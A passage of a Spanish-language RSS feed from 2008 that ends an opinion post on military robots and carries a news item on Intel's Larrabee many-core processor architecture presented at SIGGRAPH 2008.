<p>Estoy completamente seguro que el desarrollo de dichas tecnologías no parará ahí. Como es de costumbre en las personas, siempre vamos a evolucionar las tecnologías actuales que usamos en nuestra vida diaria, ¿y que mejor que evolucionar la tecnología que me permite acabar con mis enemigos?</p>
<p>Terminator no es una simple película, es un llamado a toda la humanidad a no depositar tanta confianza en los robots porque podríamos terminar asi. En lo personal, me agradaría vivir en un mundo lleno de robots que se encarguen de muchas cosas, siempre y cuando exista también la manera de reprogramar (contra atacar?). De cierta forma siento algo de satisfacción cuando veo que los temas polémicos que nos muestra el anime con respecto a la robotica y al futuro de la humanidad se vuelven cada día más tangibles <img src="../wp-includes/images/smilies/icon_smile.gif" alt=":)" /></p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824736" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/incrementa-el-uso-militar-de-robots.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/incrementa-el-uso-militar-de-robots.xhtml</feedburner:origLink></item>
		<item>
		<title>Primeros detalles del futuro diseño de Intel para procesadores, llamado ‘Larrabee’</title>
		<link>http://feeds.feedburner.com/~r/Emula2/~3/368824737/primeros-detalles-del-futuro-diseno-de-intel-para-procesadores-llamado-larrabee.xhtml</link>
		<comments>http://www.dragonjar.org/primeros-detalles-del-futuro-diseno-de-intel-para-procesadores-llamado-larrabee.xhtml#comments</comments>
		<pubDate>Tue, 05 Aug 2008 04:44:19 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
		
		<category><![CDATA[Noticias Hardware]]></category>

		<category><![CDATA[Diseño]]></category>

		<category><![CDATA[Intel]]></category>

		<category><![CDATA[Larrabee]]></category>

		<category><![CDATA[Procesador]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=75</guid>
		<description><![CDATA[
Los detalles de esta nueva arquitectura han sido lanzados por Intel en una conferencia sobre ‘Larrabee’ en la SIGGRAPH 2008. Los detalles incluyen un nuevo acercamiento de renderizacion de 3D basada en software, un modelo de programación de muchos núcleos y análisis de desempeño para bastantes aplicaciones.
El primer producto basado en Larrabee se enfocara al [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img src="http://img244.imageshack.us/img244/8268/larabeepg4.jpg" alt="Procesadores Intel Larrabee" /></p>
<p>Los detalles de esta nueva arquitectura han sido lanzados por Intel en una conferencia sobre ‘Larrabee’ en la SIGGRAPH 2008. Los detalles incluyen un nuevo acercamiento de renderizacion de 3D basada en software, un modelo de programación de muchos núcleos y análisis de desempeño para bastantes aplicaciones.</p>
<p>El primer producto basado en Larrabee se enfocara al mercado de gráficos mediante computadores personales y se espera que salga en el 2009 o 2010. Larrabee sera la primera arquitectura “many-core” x86 de Intel en la industria, significando que sera basado en un arreglo de muchos procesadores. Los procesadores individuales son similar a los anteriores de Intel.<span id="more-75"></span></p>
<p>Se espera que Larrabee empiece a sacudir un poco a la industria, promoviendo esfuerzos para crear y optimizar el software para docenas, cientos y miles de núcleos que se espera que alimenten a los computadores en un futuro. Intel tiene algunos grupo de trabajo internos, proyectos y esfuerzos relacionados con software trabajando en paralelo para acelerar dicha transición, sin embargo las investigaciones de escalas a teras ha sido la inversión mas larga en las investigaciones en tecnología de Intel y se han hecho investigaciones en conjunto con más de 400 universidades, DARPA y otras compañías como Microsoft y HP para ayudar a mover la industria en esa dirección.</p>
<p>Con el tiempo, la consistencia de la arquitectura de Intel y por ende, la libertad que le ofrece a los desarrolladores otorgada por Larrabee, nos proveerán de una innovación masiva en muchas áreas y segmentos del mercado, asegura Intel. Por ejemplo, mientras los juegos actuales siguen evolucionando para ofrecernos más realismo, lo hacen con un framework de trabajo limitado y rígido. Trabajando directamente con algunos de los expertos mundiales en gráficos 3D, Larrabee les dará a los desarrolladores de juegos y de APIs un espacio en blanco donde ellos pueden innovar como nunca antes visto.</p>
<p>Las primeras implementaciones de la arquitectura Larrabee estarán enfocadas a aplicaciones de gráficos discretas que soporten DirectX y OpenGL. Adicional mente, una nueva gama de aplicaciones paralelas de alto rendimiento incluyendo aplicaciones científicas y de ingeniería se beneficiaran del modelo de programación nativo de C/C++ que trae Larrabee.</p>
<p>Puedes leer las diferentes caracteristicas de Larrabee en el <a href="http://doi.acm.org/10.1145/1360612.1360617" target="_blank">paper publicado por Intel en la ACM.</a><span><br />
</span></p>
<img src="http://feeds.feedburner.com/~r/Emula2/~4/368824737" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/primeros-detalles-del-futuro-diseno-de-intel-para-procesadores-llamado-larrabee.xhtml/feed</wfw:commentRss>
		<feedburner:origLink>http://www.dragonjar.org/primeros-detalles-del-futuro-diseno-de-intel-para-procesadores-llamado-larrabee.xhtml</feedburner:origLink></item>
	</channel>
</rss>
